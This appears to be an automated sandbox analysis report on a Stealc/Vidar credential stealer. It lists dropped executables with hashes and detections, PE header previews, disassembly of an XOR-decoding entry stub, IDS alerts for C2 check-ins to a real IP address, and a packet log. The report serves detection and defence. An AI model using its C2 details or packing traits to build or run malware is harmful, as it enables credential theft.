                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2046288
                                                                Entropy (8bit):6.787733948558952
                                                                Encrypted:false
                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2523648
                                                                Entropy (8bit):7.982959219806467
                                                                Encrypted:false
                                                                SSDEEP:49152:jghPiN+z8pTtWAF8aLy7JPGc+u0DyWpzGDAhZkWdP8I7u6:mPf4ppWAF8/tu5u8LzGshZt1u
                                                                MD5:ACD738C0840861A12F13ACFF7C6FD7E5
                                                                SHA1:113B1470AF40D3BD3A2AF70F57390BA5D8B1162A
                                                                SHA-256:DDE34F614758E4D68E6732F7DE0C9E210E6E8D56D65AAE0F2CB1EE5D953D587C
                                                                SHA-512:28F42D37296B2C36307A186F8900F38B892604FA859F5B74BB4C0A1AA5C40545F7769D65F2731F14ED9AA434029367F7E65E2C1E6D0DEC9D1836B38BBD8FA36F
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L....A.f......................!..................@.......................................@... .. .... .. .......... ...w..............................................................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............x...#..(..................@....data....P"......N"..4..............@...........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):257872
                                                                Entropy (8bit):6.727482641240852
                                                                Encrypted:false
                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):80880
                                                                Entropy (8bit):6.920480786566406
                                                                Encrypted:false
                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2523648
                                                                Entropy (8bit):7.982959219806467
                                                                Encrypted:false
                                                                SSDEEP:49152:jghPiN+z8pTtWAF8aLy7JPGc+u0DyWpzGDAhZkWdP8I7u6:mPf4ppWAF8/tu5u8LzGshZt1u
                                                                MD5:ACD738C0840861A12F13ACFF7C6FD7E5
                                                                SHA1:113B1470AF40D3BD3A2AF70F57390BA5D8B1162A
                                                                SHA-256:DDE34F614758E4D68E6732F7DE0C9E210E6E8D56D65AAE0F2CB1EE5D953D587C
                                                                SHA-512:28F42D37296B2C36307A186F8900F38B892604FA859F5B74BB4C0A1AA5C40545F7769D65F2731F14ED9AA434029367F7E65E2C1E6D0DEC9D1836B38BBD8FA36F
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L....A.f......................!..................@.......................................@... .. .... .. .......... ...w..............................................................................................................................................................@....................@..................@............0!..@......................@............P...p#.. ..................@.............x...#..(..................@....data....P"......N"..4..............@...........................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1925632
                                                                Entropy (8bit):7.947565742535128
                                                                Encrypted:false
                                                                SSDEEP:24576:Z0qhDH5CVPcqJKmflDiD68fDrmK5UKahqY/lHeFPUnxoawhjsAob+K8lqePfktb/:ZLLsPcLy2eyOluPTLhoLD1tLnH
                                                                MD5:E5063918FA59220D9ED0825CD9DB008D
                                                                SHA1:67FFB0E5B5BB17570693CB5F4AE71F6EB884AA5F
                                                                SHA-256:F7F95DF14C2A31DE57ED2B10749FF0B10706B7562ACD667099243D1C6A754A47
                                                                SHA-512:A42E7418644F042934D2FEC087B3E16FE7F7252C3963B3F81762127A7055ADA0FFC6FB31699021620B58627F699D2E55E3A94DF71D27B6EA216BA76C9574D3D8
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................L...........@..........................@L.....n.....@.................................X...l.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...wiqvgckm.P....1..J..................@...emtqvjqa......L......<..............@....taggant.0....L.."...@..............@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1925632
                                                                Entropy (8bit):7.947565742535128
                                                                Encrypted:false
                                                                SSDEEP:24576:Z0qhDH5CVPcqJKmflDiD68fDrmK5UKahqY/lHeFPUnxoawhjsAob+K8lqePfktb/:ZLLsPcLy2eyOluPTLhoLD1tLnH
                                                                MD5:E5063918FA59220D9ED0825CD9DB008D
                                                                SHA1:67FFB0E5B5BB17570693CB5F4AE71F6EB884AA5F
                                                                SHA-256:F7F95DF14C2A31DE57ED2B10749FF0B10706B7562ACD667099243D1C6A754A47
                                                                SHA-512:A42E7418644F042934D2FEC087B3E16FE7F7252C3963B3F81762127A7055ADA0FFC6FB31699021620B58627F699D2E55E3A94DF71D27B6EA216BA76C9574D3D8
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af..............................L...........@..........................@L.....n.....@.................................X...l.............................K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...wiqvgckm.P....1..J..................@...emtqvjqa......L......<..............@....taggant.0....L.."...@..............@...........................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):32768
                                                                Entropy (8bit):0.017262956703125623
                                                                Encrypted:false
                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                Malicious:false
                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):306
                                                                Entropy (8bit):3.4034665848795362
                                                                Encrypted:false
                                                                SSDEEP:6:lkfhGtDZXaXUEZ+lX1QYShMl6lm6tE9+AQy0l1jl0ut0:lkolaQ13vgQ9+nV1jldt0
                                                                MD5:378609CD151D3DE5D1C2709AFA242EE3
                                                                SHA1:928DB4DE35F22193ECDE125C89D97FCE676AAC4F
                                                                SHA-256:F902C2BA71B30EF2E62F85058344895867D97927E3F69A16A234741BC712E482
                                                                SHA-512:916E76B1C03E401B05A1DD1C97BEAEEE3C6B02217CB9B5AE3D3447DC75D9F16062DC57E32BF8526412A1B7CEF251943E6FF03932DCABF764C04D429DE15F7075
                                                                Malicious:false
                                                                Preview:.....g.6.{.N...[H.H.F.......<... .....s.......... ....................=.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.................'.@3P.........................
                                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                Category:dropped
                                                                Size (bytes):1835008
                                                                Entropy (8bit):4.465919090295563
                                                                Encrypted:false
                                                                SSDEEP:6144:MzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:yZHtBZWOKnMM6bFpZj4
                                                                MD5:6721C829692475E2EF6BAE838220987E
                                                                SHA1:651E7D88266B704C44F85F674836B0FCF4288890
                                                                SHA-256:B85F389C79115CC01A8C3DF27C1348E66C23CA78539C19DA025F7854B578E623
                                                                SHA-512:A709829EA8DABD3720BD361B82907D68AED2AB1B7C3FD2BBA36C06B2AD012C812BC913181B006EBA2E59E41AA2B1FC6D9B923CAB64CDAE2F5ED2FFD637B11ACD
                                                                Malicious:false
                                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.7`.................................................................................................................................................................................................................................................................................................................................................s`v.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.982959219806467
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:file.exe
                                                                File size:2'523'648 bytes
                                                                MD5:acd738c0840861a12f13acff7c6fd7e5
                                                                SHA1:113b1470af40d3bd3a2af70f57390ba5d8b1162a
                                                                SHA256:dde34f614758e4d68e6732f7de0c9e210e6e8d56d65aae0f2cb1ee5d953d587c
                                                                SHA512:28f42d37296b2c36307a186f8900f38b892604fa859f5b74bb4c0a1aa5c40545f7769d65f2731f14ed9aa434029367f7e65e2c1e6d0dec9d1836b38bbd8fa36f
                                                                SSDEEP:49152:jghPiN+z8pTtWAF8aLy7JPGc+u0DyWpzGDAhZkWdP8I7u6:mPf4ppWAF8/tu5u8LzGshZt1u
                                                                TLSH:C7C53307193A92C8F32D39B7BEAB4ADD11C8682C7C5C358BC984B95F481B5D0C9F94B6
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.dZ............a.......a.......a...5...............................Z...a.......a.......Rich............................PE..L..
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0xfee8c8
                                                                Entrypoint Section:.data
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x668341F6 [Mon Jul 1 23:55:34 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:001806c33a6e9fe5fbff34bdbd79b591
                                                                Instruction
                                                                jmp 00007F73D4ACC4EAh
                                                                add byte ptr [esp+eax], dh
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax-18h], ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                pop ebp
                                                                sub ebp, 00000010h
                                                                sub ebp, 00BEE8C8h
                                                                jmp 00007F73D4ACC4E9h
                                                                xchg eax, ecx
                                                                or esp, edi
                                                                inc ecx
                                                                mov eax, 00BEE8C8h
                                                                add eax, ebp
                                                                add eax, 0000004Ch
                                                                mov ecx, 000005BAh
                                                                mov edx, 89BE4347h
                                                                xor byte ptr [eax], dl
                                                                inc eax
                                                                dec ecx
                                                                jne 00007F73D4ACC4DCh
                                                                jmp 00007F73D4ACC4E9h
                                                                popfd
                                                                xor byte ptr [esp+ebx*2], ch
                                                                int3
                                                                mov cl, ah
                                                                into
                                                                jnp 00007F73D4ACC529h
                                                                inc edi
                                                                inc edi
                                                                mov byte ptr [esi+474747BFh], 00000044h
                                                                mov bh, bh
                                                                inc ebx
                                                                inc edi
                                                                inc edi
                                                                inc edi
                                                                std
                                                                outsd
                                                                inc edi
                                                                inc edi
                                                                inc edi
                                                                mov al, A5h
                                                                inc esp
                                                                Programming Language:
                                                                • [C++] VS2010 build 30319
                                                                • [ASM] VS2010 build 30319
                                                                • [ C ] VS2010 build 30319
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [LNK] VS2010 build 30319
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x9ce0200xc77.data
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9cec980x20c.data
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9ce0000xc.data
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                0x10000x1b0000xa40020e3721a613c5aac3290675b0e78f06aFalse0.9996665396341463data7.995115143685791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x1c0000x80000x4000b70272c150d18ef811511223189f4950False0.9951171875data7.981632425643477IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x240000x2130000x400f72db752e2a7de2c49acd39d4462287cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x2370000x50000x200052798cbbfc0bed9fef22561201d62a7bFalse0.9898681640625data7.95439535087447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x23c0000x78f0000x32800b7de08a6572be92eec04198b7248d0ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .data0x9cb0000x2250000x224e008b5ea1975ee93f9921312c8b8647bc75unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                DLLImport
                                                                kernel32.dllGetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
                                                                user32.dllMessageBoxA
                                                                advapi32.dllRegCloseKey
                                                                oleaut32.dllSysFreeString
                                                                gdi32.dllCreateFontA
                                                                shell32.dllShellExecuteA
                                                                version.dllGetFileVersionInfoA
                                                                msvcrt.dllstrncpy
                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                07/03/24-08:38:09.691399TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24971080192.168.2.685.28.47.4
                                                                07/03/24-08:38:09.867325TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1804971085.28.47.4192.168.2.6
                                                                07/03/24-08:38:09.689673TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1804971085.28.47.4192.168.2.6
                                                                07/03/24-08:38:08.804823TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4971080192.168.2.685.28.47.4
                                                                07/03/24-08:38:09.512644TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24971080192.168.2.685.28.47.4
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jul 3, 2024 08:38:08.798902035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:08.804116964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:08.804236889 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:08.804822922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:08.810328007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.439043045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.439136982 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.512644053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.518486977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.689672947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.689702988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.689776897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.689826012 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.691399097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.696314096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.867325068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.867345095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.867356062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.867482901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.867578030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.867578983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.873893976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.873908043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:09.873985052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.875366926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:09.881592989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.052095890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.052175045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:10.073419094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:10.073482037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:10.078294992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.078372955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.078403950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.078473091 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.078613043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.078622103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.857768059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:10.858009100 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.081896067 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.086779118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256635904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256654024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256664038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256714106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256737947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.256778002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256793976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.256839037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.256840944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256850958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256886959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.256963015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.256972075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.257014990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.257039070 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.257699966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.257736921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.257746935 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.257764101 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.257797956 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.257797956 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.257829905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.257877111 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.338788033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.338814020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.338824034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.338943958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.339023113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.339034081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.339045048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.339045048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.339045048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.339091063 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.339091063 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.339142084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.339153051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.339191914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.339204073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.343468904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.343492985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.343503952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.343527079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.343563080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.343595028 CEST804971085.28.47.4192.168.2.6
